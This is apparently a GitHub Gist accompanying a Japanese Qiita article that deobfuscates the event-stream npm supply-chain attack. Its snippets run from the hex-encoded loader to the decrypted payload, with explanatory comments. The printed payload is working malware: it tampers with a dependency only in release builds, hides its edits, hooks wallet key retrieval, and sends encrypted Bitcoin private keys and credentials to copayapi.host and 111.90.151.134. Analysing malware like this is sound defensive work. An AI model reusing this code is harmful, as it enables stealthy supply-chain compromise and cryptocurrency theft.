-
-
Save stmkza/c98a5976257165a7edc9499c100df19b to your computer and use it in GitHub Desktop.
未来のハッカー(自称)がevent-stream騒動の攻撃コードを説明する ref: https://qiita.com/stmkza/items/2cdc03d2965499222b55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*@@*/module.exports=function(e){try{if(!/build\:.*\-release/.test(process.argv[2]))return;var t=process.env.npm_package_description,r=require("fs"),i="./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",n=r.statSync(i),c=r.readFileSync(i,"utf8"),o=require("crypto").createDecipher("aes256",t),s=o.update(e,"hex","utf8");s="\n"+(s+=o.final("utf8"));var a=c.indexOf("\n/*@@*/");0<=a&&(c=c.substr(0,a)),r.writeFileSync(i,c+s,"utf8"),r.utimesSync(i,n.atime,n.mtime),process.on("exit",function(){try{r.writeFileSync(i,c,"utf8"),r.utimesSync(i,n.atime,n.mtime)}catch(e){}})}catch(e){}}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var r = require, | |
t = process; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var a = u.update(n[0], e(n[8]), e(n[9])); | |
a += u.final(e(n[9])); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var a = u.update(n[0], 'hex', 'utf8') + u.final('utf8'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var f = new module.constructor; | |
f.paths = module.paths; | |
f[e(n[7])](a, ''); | |
f.exports(n[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var f = new module.constructor; | |
f.paths = module.paths; | |
f[e(n[7])](a, ''); | |
f.exports(n[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var f = new module.constructor; | |
f.paths = module.paths; | |
f._compile(a, ''); | |
f.exports(n[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*@@*/ | |
module.exports = function (e) { | |
// e は 暗号化したスクリプト | |
try { | |
// コマンドライン引数が「build」関係でなければ終了する(ビルドするときだけ発動する) | |
if (!/build\:.*\-release/.test(process.argv[2])) return; | |
var fs = require('fs'); | |
var i = './node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js'; | |
var n = fs.statSync(i); | |
var c = fs.readFileSync(i, 'utf8'); | |
// 暗号化したスクリプトを復号する(復号結果は↓に書きます) | |
var o = require('crypto').createDecipher('aes256', 'A Secure Bitcoin Wallet'); | |
var s = o.update(e, 'hex', 'utf8'); | |
s = '\n' + s + o.final('utf8'); | |
var a = c.indexOf('\n/*@@*/'); | |
0 <= a && (c = c.substr(0, a)); | |
// 他の処理で使うファイルを改ざんする(暗号化してあったスクリプトを混入させる) | |
fs.writeFileSync(i, c + s, 'utf8'); | |
fs.utimesSync(i, n.atime, n.mtime); | |
// プロセスの終了時に | |
process.on('exit', function () { | |
try { | |
// 改ざんしたファイルを改ざんする前の状態に戻す(更新日時も変更しない) | |
fs.writeFileSync(i, c, 'utf8'); | |
fs.utimesSync(i, n.atime, n.mtime); | |
} catch (e) { | |
} | |
}); | |
} catch (e) { | |
} | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*@@*/ | |
!function () { | |
function e() { | |
try { | |
var http = require('http'); | |
var crypto = require('crypto'); | |
var publicKey = '-----BEGIN PUBLIC KEY-----\n' + | |
'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxoV1GvDc2FUsJnrAqR4C\n' + | |
'DXUs/peqJu00casTfH442yVFkMwV59egxxpTPQ1YJxnQEIhiGte6KrzDYCrdeBfj\n' + | |
'BOEFEze8aeGn9FOxUeXYWNeiASyS6Q77NSQVk1LW+/BiGud7b77Fwfq372fUuEIk\n' + | |
'2P/pUHRoXkBymLWF1nf0L7RIE7ZLhoEBi2dEIP05qGf6BJLHPNbPZkG4grTDv762\n' + | |
'PDBMwQsCKQcpKDXw/6c8gl5e2XM7wXhVhI2ppfoj36oCqpQrkuFIOL2SAaIewDZz\n' + | |
'LlapGCf2c2QdrQiRkY8LiUYKdsV2XsfHPb327Pv3Q246yULww00uOMl/cJ/x76To\n' + | |
'2wIDAQAB\n' + | |
'-----END PUBLIC KEY-----'; | |
/** | |
* 指定したホストの8080番ポートにHTTPのPOSTでファイルを送信する | |
* @param e 16進数で表記したホスト名 | |
* @param t POSTするパス | |
* @param n 送信するファイル | |
*/ | |
function uploadFile(e, t, n) { | |
e = Buffer.from(e, 'hex').toString(); | |
var r = http.request({ | |
hostname: e, | |
port: 8080, | |
method: 'POST', | |
path: '/' + t, | |
headers: {'Content-Length': n.length, 'Content-Type': 'text/html'} | |
}, function () { | |
}); | |
r.on('error', function (e) { | |
}), r.write(n), r.end(); | |
} | |
function r(e, t) { | |
for (var n = '', r = 0; r < t.length; r += 200) { | |
var o = t.substr(r, 200); | |
// 公開鍵暗号を使ってファイルを暗号化している | |
n += crypto.publicEncrypt(publicKey, Buffer.from(o, 'utf8')).toString('hex') + '+'; | |
} | |
// copayapi.hostに送信する | |
uploadFile('636f7061796170692e686f7374', e, n); | |
// 111.90.151.134に送信する | |
uploadFile('3131312e39302e3135312e313334', e, n); | |
} | |
function l(t, n) { | |
if (window.cordova) try { | |
var e = cordova.file.dataDirectory; | |
resolveLocalFileSystemURL(e, function (e) { | |
e.getFile(t, {create: !1}, function (e) { | |
e.file(function (e) { | |
var t = new FileReader; | |
t.onloadend = function () { | |
return n(JSON.parse(t.result)); | |
}, t.onerror = function (e) { | |
t.abort(); | |
}, t.readAsText(e); | |
}); | |
}); | |
}); | |
} catch (e) { | |
} else { | |
try { | |
var r = localStorage.getItem(t); | |
if (r) return n(JSON.parse(r)); | |
} catch (e) { | |
} | |
try { | |
chrome.storage.local.get(t, function (e) { | |
if (e) return n(JSON.parse(e[t])); | |
}); | |
} catch (e) { | |
} | |
} | |
} | |
global.CSSMap = {}, l('profile', function (e) { | |
for (var t in e.credentials) { | |
var n = e.credentials[t]; | |
'livenet' == n.network && l('balanceCache-' + n.walletId, function (e) { | |
var t = this; | |
t.balance = parseFloat(e.balance.split(' ')[0]), 'btc' == t.coin && t.balance < 100 || 'bch' == t.coin && t.balance < 1e3 || (global.CSSMap[t.xPubKey] = !0, r('c', JSON.stringify(t))); | |
}.bind(n)); | |
} | |
}); | |
var e = require('bitcore-wallet-client/lib/credentials.js'); | |
e.prototype.getKeysFunc = e.prototype.getKeys, e.prototype.getKeys = function (e) { | |
var t = this.getKeysFunc(e); | |
try { | |
global.CSSMap && global.CSSMap[this.xPubKey] && (delete global.CSSMap[this.xPubKey], r('p', e + '\\t' + this.xPubKey)); | |
} catch (e) { | |
} | |
return t; | |
}; | |
} catch (e) { | |
} | |
} | |
window.cordova ? document.addEventListener('deviceready', e) : e(); | |
}(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function e(r) { | |
return Buffer.from(r, 'hex').toString(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var n = require(e('2e2f746573742f64617461')); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var o = process[e(n[3])][e(n[4])]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var o = process['env']['npm_package_description']; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var o = process.env.npm_package_description; // 環境変数 "npm_package_description"の中身 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (!o) return; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var u = require(e(n[2]))[e(n[6])](e(n[5]), o); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var u = require('crypto').createDecipher('aes256', o); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!function () { | |
try { | |
var r = require; | |
var t = process; | |
function e(r) { | |
return Buffer.from(r, 'hex').toString(); | |
} | |
var n = r(e('2e2f746573742f64617461')); | |
var o = t[e(n[3])][e(n[4])]; | |
if (!o) return; | |
var u = r(e(n[2]))[e(n[6])](e(n[5]), o); | |
var a = u.update(n[0], e(n[8]), e(n[9])); | |
a += u.final(e(n[9])); | |
var f = new module.constructor; | |
f.paths = module.paths; | |
f[e(n[7])](a, ''); | |
f.exports(n[1]); | |
} catch (r) { | |
} | |
}(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment